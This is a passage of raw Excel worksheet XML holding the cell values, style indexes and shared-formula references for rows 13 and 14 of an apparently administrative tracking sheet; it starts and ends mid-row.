        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="DD13" s="106">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="DE13" s="106">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="DF13" s="106">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="DG13" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH13" s="106">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="DI13" s="106">
        <f t="shared" si="22"/>
        <v>0</v>
      </c>
      <c r="DJ13" s="106">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="DK13" s="107">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>
      <c r="DL13" s="106">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
      <c r="DM13" s="108">
        <v>44489.0</v>
      </c>
      <c r="DN13" s="108">
        <v>1.0</v>
      </c>
      <c r="DO13" s="108">
        <v>1.0</v>
      </c>
      <c r="DP13" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ13" s="108">
        <v>44489.0</v>
      </c>
      <c r="DR13" s="108">
        <v>1.0</v>
      </c>
      <c r="DS13" s="108">
        <v>1.0</v>
      </c>
      <c r="DT13" s="108">
        <v>44489.0</v>
      </c>
      <c r="DU13" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV13" s="108">
        <f t="shared" si="63"/>
        <v>44489</v>
      </c>
      <c r="DW13" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX13" s="108">
        <v>44489.0</v>
      </c>
      <c r="DY13" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ13" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA13" s="108">
        <v>0.0</v>
      </c>
      <c r="EB13" s="108">
        <v>0.0</v>
      </c>
      <c r="EC13" s="109">
        <v>13.0</v>
      </c>
      <c r="ED13" s="109">
        <v>1.0</v>
      </c>
      <c r="EE13" s="109">
        <v>1.0</v>
      </c>
      <c r="EF13" s="109">
        <v>1.0</v>
      </c>
      <c r="EG13" s="109">
        <v>0.0</v>
      </c>
      <c r="EH13" s="109">
        <v>1.0</v>
      </c>
      <c r="EI13" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ13" s="109">
        <v>0.0</v>
      </c>
      <c r="EK13" s="109">
        <v>0.0</v>
      </c>
      <c r="EL13" s="109">
        <v>0.0</v>
      </c>
      <c r="EM13" s="109">
        <v>1.0</v>
      </c>
      <c r="EN13" s="109">
        <v>1.0</v>
      </c>
      <c r="EO13" s="109">
        <v>1.0</v>
      </c>
      <c r="EP13" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ13" s="109">
        <v>1.0</v>
      </c>
      <c r="ER13" s="110">
        <f t="shared" si="27"/>
        <v>1</v>
      </c>
      <c r="ES13" s="110">
        <f t="shared" si="28"/>
        <v>1</v>
      </c>
      <c r="ET13" s="110">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="EU13" s="110">
        <f t="shared" si="30"/>
        <v>1</v>
      </c>
      <c r="EV13" s="110">
        <f t="shared" si="31"/>
        <v>1</v>
      </c>
      <c r="EW13" s="110">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="EX13" s="110">
        <f t="shared" si="33"/>
        <v>1</v>
      </c>
      <c r="EY13" s="110">
        <f t="shared" si="34"/>
        <v>1</v>
      </c>
      <c r="EZ13" s="110">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="FA13" s="110">
        <f t="shared" si="36"/>
        <v>0</v>
      </c>
      <c r="FB13" s="110">
        <f t="shared" si="37"/>
        <v>0</v>
      </c>
      <c r="FC13" s="111" t="s">
        <v>421</v>
      </c>
      <c r="FD13" s="111">
        <v>5.0</v>
      </c>
      <c r="FE13" s="111">
        <v>9.0</v>
      </c>
      <c r="FF13" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG13" s="111" t="s">
        <v>422</v>
      </c>
      <c r="FH13" s="111">
        <v>3.0</v>
      </c>
      <c r="FI13" s="111">
        <v>7.0</v>
      </c>
      <c r="FJ13" s="111" t="s">
        <v>421</v>
      </c>
      <c r="FK13" s="111" t="s">
        <v>423</v>
      </c>
      <c r="FL13" s="111" t="str">
        <f t="shared" si="64"/>
        <v>44489, 2002752, 2002749, 2044666, 2051116</v>
      </c>
      <c r="FM13" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN13" s="111" t="s">
        <v>421</v>
      </c>
      <c r="FO13" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP13" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ13" s="111">
        <v>0.0</v>
      </c>
      <c r="FR13" s="111">
        <v>0.0</v>
      </c>
      <c r="FS13" s="112">
        <v>13.0</v>
      </c>
      <c r="FT13" s="112">
        <v>7.0</v>
      </c>
      <c r="FU13" s="112">
        <v>7.0</v>
      </c>
      <c r="FV13" s="112">
        <v>1.0</v>
      </c>
      <c r="FW13" s="112">
        <v>8.0</v>
      </c>
      <c r="FX13" s="112">
        <v>9.0</v>
      </c>
      <c r="FY13" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ13" s="112">
        <v>0.0</v>
      </c>
      <c r="GA13" s="112">
        <v>0.0</v>
      </c>
      <c r="GB13" s="112">
        <v>0.0</v>
      </c>
      <c r="GC13" s="112">
        <v>6.0</v>
      </c>
      <c r="GD13" s="112">
        <v>6.0</v>
      </c>
      <c r="GE13" s="112">
        <v>1.0</v>
      </c>
      <c r="GF13" s="112">
        <v>6.0</v>
      </c>
      <c r="GG13" s="112">
        <v>7.0</v>
      </c>
      <c r="GH13" s="113">
        <f t="shared" si="39"/>
        <v>7</v>
      </c>
      <c r="GI13" s="113">
        <f t="shared" si="40"/>
        <v>6</v>
      </c>
      <c r="GJ13" s="113">
        <f t="shared" si="41"/>
        <v>0</v>
      </c>
      <c r="GK13" s="113">
        <f t="shared" si="42"/>
        <v>7</v>
      </c>
      <c r="GL13" s="113">
        <f t="shared" si="43"/>
        <v>6</v>
      </c>
      <c r="GM13" s="113">
        <f t="shared" si="44"/>
        <v>0</v>
      </c>
      <c r="GN13" s="113">
        <f t="shared" si="45"/>
        <v>9</v>
      </c>
      <c r="GO13" s="113">
        <f t="shared" si="46"/>
        <v>7</v>
      </c>
      <c r="GP13" s="113">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="GQ13" s="114">
        <f t="shared" si="48"/>
        <v>0</v>
      </c>
      <c r="GR13" s="113">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="GS13" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT13" s="94"/>
      <c r="GU13" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV13" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW13" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX13" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY13" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ13" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA13" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB13" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC13" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD13" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE13" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF13" s="117" t="str">
        <f t="shared" si="50"/>
        <v>-</v>
      </c>
      <c r="HG13" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH13" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI13" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ13" s="93" t="s">
        <v>424</v>
      </c>
      <c r="HK13" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL13" s="93">
        <v>4.0</v>
      </c>
      <c r="HM13" s="93">
        <f t="shared" si="52"/>
        <v>0</v>
      </c>
      <c r="HN13" s="93">
        <v>0.0</v>
      </c>
      <c r="HO13" s="93">
        <v>0.0</v>
      </c>
      <c r="HP13" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ13" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR13" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS13" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT13" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HU13" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV13" s="119" t="s">
        <v>425</v>
      </c>
      <c r="HW13" s="119">
        <v>2.0</v>
      </c>
      <c r="HX13" s="119">
        <v>5.0</v>
      </c>
      <c r="HY13" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ13" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA13" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB13" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC13" s="120" t="str">
        <f t="shared" si="65"/>
        <v>92322, 33836</v>
      </c>
      <c r="ID13" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE13" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF13" s="120" t="s">
        <v>425</v>
      </c>
      <c r="IG13" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH13" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II13" s="99" t="s">
        <v>426</v>
      </c>
      <c r="IJ13" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK13" s="99">
        <v>5.0</v>
      </c>
      <c r="IL13" s="99">
        <v>0.0</v>
      </c>
      <c r="IM13" s="121">
        <f t="shared" si="57"/>
        <v>0</v>
      </c>
      <c r="IN13" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO13" s="98">
        <v>0.0</v>
      </c>
      <c r="IP13" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ13" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR13" s="118">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="IS13" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT13" s="127"/>
      <c r="IU13" s="127"/>
      <c r="IV13" s="127"/>
      <c r="IW13" s="127"/>
      <c r="IX13" s="127"/>
      <c r="IY13" s="127"/>
      <c r="IZ13" s="127"/>
      <c r="JA13" s="127"/>
      <c r="JB13" s="127"/>
      <c r="JC13" s="127"/>
      <c r="JD13" s="127"/>
      <c r="JE13" s="127"/>
      <c r="JF13" s="127"/>
      <c r="JG13" s="127"/>
      <c r="JH13" s="127"/>
      <c r="JI13" s="127"/>
      <c r="JJ13" s="127"/>
      <c r="JK13" s="127"/>
      <c r="JL13" s="127"/>
      <c r="JM13" s="127"/>
      <c r="JN13" s="127"/>
      <c r="JO13" s="127"/>
      <c r="JP13" s="127"/>
      <c r="JQ13" s="127"/>
      <c r="JR13" s="127"/>
      <c r="JS13" s="127"/>
      <c r="JT13" s="127"/>
      <c r="JU13" s="127"/>
      <c r="JV13" s="127"/>
      <c r="JW13" s="127"/>
      <c r="JX13" s="127"/>
      <c r="JY13" s="127"/>
      <c r="JZ13" s="127"/>
      <c r="KA13" s="127"/>
      <c r="KB13" s="127"/>
      <c r="KC13" s="127"/>
      <c r="KD13" s="127"/>
      <c r="KE13" s="127"/>
      <c r="KF13" s="127"/>
      <c r="KG13" s="127"/>
      <c r="KH13" s="127"/>
      <c r="KI13" s="127"/>
      <c r="KJ13" s="127"/>
      <c r="KK13" s="127"/>
      <c r="KL13" s="127"/>
      <c r="KM13" s="127"/>
      <c r="KN13" s="127"/>
      <c r="KO13" s="127"/>
      <c r="KP13" s="127"/>
      <c r="KQ13" s="127"/>
      <c r="KR13" s="127"/>
      <c r="KS13" s="127"/>
      <c r="KT13" s="127"/>
      <c r="KU13" s="127"/>
      <c r="KV13" s="127"/>
      <c r="KW13" s="127"/>
      <c r="KX13" s="127"/>
      <c r="KY13" s="127"/>
      <c r="KZ13" s="127"/>
      <c r="LA13" s="127"/>
      <c r="LB13" s="127"/>
      <c r="LC13" s="127"/>
      <c r="LD13" s="127"/>
      <c r="LE13" s="127"/>
      <c r="LF13" s="127"/>
      <c r="LG13" s="127"/>
      <c r="LH13" s="127"/>
      <c r="LI13" s="127"/>
      <c r="LJ13" s="127"/>
      <c r="LK13" s="127"/>
      <c r="LL13" s="127"/>
      <c r="LM13" s="127"/>
      <c r="LN13" s="127"/>
      <c r="LO13" s="127"/>
      <c r="LP13" s="127"/>
      <c r="LQ13" s="127"/>
      <c r="LR13" s="127"/>
      <c r="LS13" s="127"/>
      <c r="LT13" s="127"/>
      <c r="LU13" s="127"/>
      <c r="LV13" s="127"/>
      <c r="LW13" s="127"/>
      <c r="LX13" s="127"/>
      <c r="LY13" s="127"/>
      <c r="LZ13" s="127"/>
      <c r="MA13" s="127"/>
      <c r="MB13" s="127"/>
      <c r="MC13" s="127"/>
      <c r="MD13" s="127"/>
      <c r="ME13" s="127"/>
      <c r="MF13" s="127"/>
      <c r="MG13" s="127"/>
      <c r="MH13" s="127"/>
      <c r="MI13" s="127"/>
      <c r="MJ13" s="127"/>
      <c r="MK13" s="127"/>
      <c r="ML13" s="127"/>
      <c r="MM13" s="127"/>
      <c r="MN13" s="127"/>
      <c r="MO13" s="127"/>
      <c r="MP13" s="127"/>
      <c r="MQ13" s="127"/>
      <c r="MR13" s="127"/>
      <c r="MS13" s="127"/>
      <c r="MT13" s="127"/>
      <c r="MU13" s="127"/>
      <c r="MV13" s="127"/>
      <c r="MW13" s="127"/>
      <c r="MX13" s="127"/>
      <c r="MY13" s="127"/>
      <c r="MZ13" s="127"/>
      <c r="NA13" s="127"/>
      <c r="NB13" s="127"/>
      <c r="NC13" s="127"/>
      <c r="ND13" s="127"/>
      <c r="NE13" s="127"/>
      <c r="NF13" s="127"/>
      <c r="NG13" s="127"/>
      <c r="NH13" s="127"/>
      <c r="NI13" s="127"/>
      <c r="NJ13" s="127"/>
      <c r="NK13" s="127"/>
      <c r="NL13" s="127"/>
      <c r="NM13" s="127"/>
      <c r="NN13" s="127"/>
      <c r="NO13" s="127"/>
      <c r="NP13" s="127"/>
      <c r="NQ13" s="127"/>
      <c r="NR13" s="127"/>
      <c r="NS13" s="127"/>
      <c r="NT13" s="127"/>
      <c r="NU13" s="127"/>
      <c r="NV13" s="127"/>
      <c r="NW13" s="127"/>
      <c r="NX13" s="127"/>
      <c r="NY13" s="127"/>
    </row>
    <row r="14" ht="222.75" customHeight="1">
      <c r="B14" s="89" t="s">
        <v>427</v>
      </c>
      <c r="C14" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D14" s="90" t="s">
        <v>428</v>
      </c>
      <c r="E14" s="90" t="s">
        <v>429</v>
      </c>
      <c r="F14" s="90" t="s">
        <v>430</v>
      </c>
      <c r="G14" s="90" t="s">
        <v>12</v>
      </c>
      <c r="H14" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I14" s="92" t="s">
        <v>431</v>
      </c>
      <c r="J14" s="92" t="s">
        <v>432</v>
      </c>
      <c r="K14" s="92" t="s">
        <v>433</v>
      </c>
      <c r="L14" s="93" t="s">
        <v>267</v>
      </c>
      <c r="M14" s="93">
        <v>3.0</v>
      </c>
      <c r="N14" s="93">
        <v>1.0</v>
      </c>
      <c r="O14" s="93">
        <v>0.0</v>
      </c>
      <c r="P14" s="93">
        <v>1.0</v>
      </c>
      <c r="Q14" s="93">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R14" s="93">
        <v>1.0</v>
      </c>
      <c r="S14" s="93">
        <v>0.0</v>
      </c>
      <c r="T14" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U14" s="95" t="s">
        <v>219</v>
      </c>
      <c r="V14" s="96" t="s">
        <v>434</v>
      </c>
      <c r="W14" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X14" s="97" t="s">
        <v>435</v>
      </c>
      <c r="Y14" s="96" t="s">
        <v>436</v>
      </c>
      <c r="Z14" s="96" t="s">
        <v>437</v>
      </c>
      <c r="AA14" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB14" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC14" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD14" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE14" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF14" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG14" s="98" t="s">
        <v>306</v>
      </c>
      <c r="AH14" s="99" t="s">
        <v>438</v>
      </c>
      <c r="AI14" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ14" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK14" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL14" s="100">
        <v>0.0</v>
      </c>
      <c r="AM14" s="100">
        <v>0.0</v>
      </c>
      <c r="AN14" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO14" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP14" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ14" s="100">
        <v>0.0</v>
      </c>
      <c r="AR14" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS14" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT14" s="100" t="str">
        <f t="shared" si="2"/>
        <v>-</v>
      </c>
      <c r="AU14" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV14" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW14" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX14" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY14" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ14" s="100">
        <v>0.0</v>
      </c>
      <c r="BA14" s="102">
        <v>3.0</v>
      </c>
      <c r="BB14" s="102">
        <v>0.0</v>
      </c>
      <c r="BC14" s="102">
        <v>0.0</v>
      </c>
      <c r="BD14" s="102">
        <v>0.0</v>
      </c>
      <c r="BE14" s="102">
        <v>0.0</v>
      </c>
      <c r="BF14" s="102">
        <v>0.0</v>
      </c>
      <c r="BG14" s="102">
        <v>0.0</v>
      </c>
      <c r="BH14" s="102">
        <v>0.0</v>
      </c>
      <c r="BI14" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ14" s="102">
        <v>0.0</v>
      </c>
      <c r="BK14" s="102">
        <v>0.0</v>
      </c>
      <c r="BL14" s="103">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BM14" s="103">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="BN14" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO14" s="103">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="BP14" s="103">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="BQ14" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR14" s="103">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="BS14" s="103">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="BT14" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU14" s="103">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="BV14" s="103">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="BW14" s="104" t="s">
        <v>12</v>
      </c>
      <c r="BX14" s="104">
        <v>0.0</v>
      </c>
      <c r="BY14" s="104">
        <v>0.0</v>
      </c>
      <c r="BZ14" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA14" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CB14" s="104">
        <v>0.0</v>
      </c>
      <c r="CC14" s="104">
        <v>0.0</v>
      </c>
      <c r="CD14" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE14" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF14" s="104" t="str">
        <f t="shared" si="14"/>
        <v>-</v>
      </c>
      <c r="CG14" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH14" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI14" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ14" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK14" s="104">
        <v>0.0</v>
      </c>
      <c r="CL14" s="104">
        <v>0.0</v>
      </c>
      <c r="CM14" s="105">
        <v>3.0</v>
      </c>
      <c r="CN14" s="105">
        <v>0.0</v>
      </c>
      <c r="CO14" s="105">
        <v>0.0</v>
      </c>
      <c r="CP14" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ14" s="105">
        <v>0.0</v>
      </c>
      <c r="CR14" s="105">
        <v>0.0</v>
      </c>
      <c r="CS14" s="105">
        <v>0.0</v>
      </c>
      <c r="CT14" s="105">
        <v>0.0</v>
      </c>
      <c r="CU14" s="105">
        <v>0.0</v>
      </c>
      <c r="CV14" s="105">
        <v>0.0</v>
      </c>
      <c r="CW14" s="105">
        <v>0.0</v>
      </c>
      <c r="CX14" s="105">
        <v>0.0</v>
      </c>
      <c r="CY14" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ14" s="105">
        <v>0.0</v>
      </c>
      <c r="DA14" s="105">
        <v>0.0</v>
      </c>
      <c r="DB14" s="106">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="DC14" s="106">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="DD14" s="106">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="DE14" s="106">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="DF14" s="106">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="DG14" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH14" s="106">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="DI14" s="106">
        <f t="shared" si="22"/>
        <v>0</v>
      </c>
      <c r="DJ14" s="106">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="DK14" s="107">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>
      <c r="DL14" s="106">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
      <c r="DM14" s="108">
        <v>44489.0</v>
      </c>
      <c r="DN14" s="108">
        <v>1.0</v>
      </c>
      <c r="DO14" s="108">
        <v>1.0</v>
      </c>
      <c r="DP14" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ14" s="108">
        <v>44489.0</v>
      </c>
      <c r="DR14" s="108">
        <v>1.0</v>
      </c>
      <c r="DS14" s="108">
        <v>1.0</v>
      </c>
      <c r="DT14" s="108">
        <v>44489.0</v>
      </c>
      <c r="DU14" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV14" s="108">
        <f t="shared" si="63"/>
        <v>44489</v>
      </c>
      <c r="DW14" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX14" s="108">
        <v>44489.0</v>
      </c>
      <c r="DY14" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ14" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA14" s="108">
        <v>0.0</v>
      </c>
      <c r="EB14" s="108">
        <v>0.0</v>
      </c>
      <c r="EC14" s="109">
        <v>3.0</v>
      </c>
      <c r="ED14" s="109">
        <v>1.0</v>
      </c>
      <c r="EE14" s="109">
        <v>1.0</v>
      </c>
      <c r="EF14" s="109">
        <v>1.0</v>
      </c>
      <c r="EG14" s="109">
        <v>0.0</v>
      </c>
      <c r="EH14" s="109">
        <v>1.0</v>
      </c>
      <c r="EI14" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ14" s="109">
        <v>0.0</v>
      </c>
      <c r="EK14" s="109">
        <v>0.0</v>
      </c>
      <c r="EL14" s="109">
        <v>0.0</v>
      </c>
      <c r="EM14" s="109">
        <v>1.0</v>
      </c>
      <c r="EN14" s="109">
        <v>1.0</v>
      </c>
      <c r="EO14" s="109">
        <v>1.0</v>
      </c>
      <c r="EP14" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ14" s="109">
        <v>1.0</v>
      </c>
      <c r="ER14" s="110">
        <f t="shared" si="27"/>
        <v>1</v>
      </c>
      <c r="ES14" s="110">
        <f t="shared" si="28"/>
        <v>1</v>
      </c>
      <c r="ET14" s="110">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="EU14" s="110">
        <f t="shared" si="30"/>
        <v>1</v>
      </c>
      <c r="EV14" s="110">
        <f t="shared" si="31"/>
        <v>1</v>
      </c>
      <c r="EW14" s="110">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="EX14" s="110">
        <f t="shared" si="33"/>
        <v>1</v>
      </c>
      <c r="EY14" s="110">
        <f t="shared" si="34"/>
        <v>1</v>
      </c>
      <c r="EZ14" s="110">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="FA14" s="110">
        <f t="shared" si="36"/>
        <v>0</v>
      </c>
      <c r="FB14" s="110">
        <f t="shared" si="37"/>
        <v>0</v>
      </c>
      <c r="FC14" s="111" t="s">
        <v>439</v>
      </c>
      <c r="FD14" s="111">
        <v>5.0</v>
      </c>
      <c r="FE14" s="111">
        <v>5.0</v>
      </c>
      <c r="FF14" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG14" s="111" t="s">
        <v>440</v>
      </c>
      <c r="FH14" s="111">
        <v>3.0</v>
      </c>
      <c r="FI14" s="111">
        <v>3.0</v>
      </c>
      <c r="FJ14" s="111" t="s">
        <v>441</v>
      </c>
      <c r="FK14" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL14" s="111" t="str">
        <f t="shared" si="64"/>
        <v>44489, 2002752, 2002749, 2044666, 2051116</v>
      </c>
      <c r="FM14" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN14" s="111" t="s">
        <v>442</v>
      </c>
      <c r="FO14" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP14" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ14" s="111">
        <v>0.0</v>
      </c>
      <c r="FR14" s="111">
        <v>0.0</v>
      </c>
      <c r="FS14" s="112">
        <v>3.0</v>
      </c>
      <c r="FT14" s="112">
        <v>3.0</v>
      </c>
      <c r="FU14" s="112">
        <v>3.0</v>
      </c>
      <c r="FV14" s="112">
        <v>1.0</v>
      </c>
      <c r="FW14" s="112">
        <v>4.0</v>
      </c>
      <c r="FX14" s="112">
        <v>4.0</v>
      </c>
      <c r="FY14" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ14" s="112">
        <v>0.0</v>
      </c>
      <c r="GA14" s="112">
        <v>0.0</v>
      </c>
      <c r="GB14" s="112">
        <v>0.0</v>
      </c>
      <c r="GC14" s="112">
        <v>2.0</v>
      </c>
      <c r="GD14" s="112">
        <v>2.0</v>
      </c>
      <c r="GE14" s="112">
        <v>1.0</v>
      </c>
      <c r="GF14" s="112">
        <v>2.0</v>
      </c>
      <c r="GG14" s="112">
        <v>3.0</v>
      </c>
      <c r="GH14" s="113">
        <f t="shared" si="39"/>
        <v>3</v>
      </c>
      <c r="GI14" s="113">
        <f t="shared" si="40"/>
        <v>2</v>
      </c>
      <c r="GJ14" s="113">
        <f t="shared" si="41"/>
        <v>0</v>
      </c>
      <c r="GK14" s="113">
        <f t="shared" si="42"/>
        <v>3</v>
      </c>
      <c r="GL14" s="113">
        <f t="shared" si="43"/>
        <v>2</v>
      </c>
      <c r="GM14" s="113">
        <f t="shared" si="44"/>
        <v>0</v>
      </c>
      <c r="GN14" s="113">
        <f t="shared" si="45"/>
        <v>4</v>
      </c>
      <c r="GO14" s="113">
        <f t="shared" si="46"/>
        <v>3</v>
      </c>
      <c r="GP14" s="113">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="GQ14" s="114">
        <f t="shared" si="48"/>
        <v>0</v>
      </c>
      <c r="GR14" s="113">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="GS14" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT14" s="94"/>
      <c r="GU14" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV14" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW14" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX14" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY14" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ14" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA14" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB14" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC14" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD14" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE14" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF14" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HG14" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH14" s="116">
        <v>31834.0</v>
      </c>
      <c r="HI14" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ14" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK14" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL14" s="93">
        <v>0.0</v>
      </c>
      <c r="HM14" s="93">
        <f t="shared" si="52"/>
        <v>1</v>
      </c>
      <c r="HN14" s="93">
        <v>0.0</v>
      </c>
      <c r="HO14" s="93">
        <v>1.0</v>
      </c>
      <c r="HP14" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ14" s="118">
        <f t="shared" si="53"/>
        <v>1</v>
      </c>
      <c r="HR14" s="118">
        <f t="shared" si="54"/>
        <v>1</v>
      </c>
      <c r="HS14" s="118">
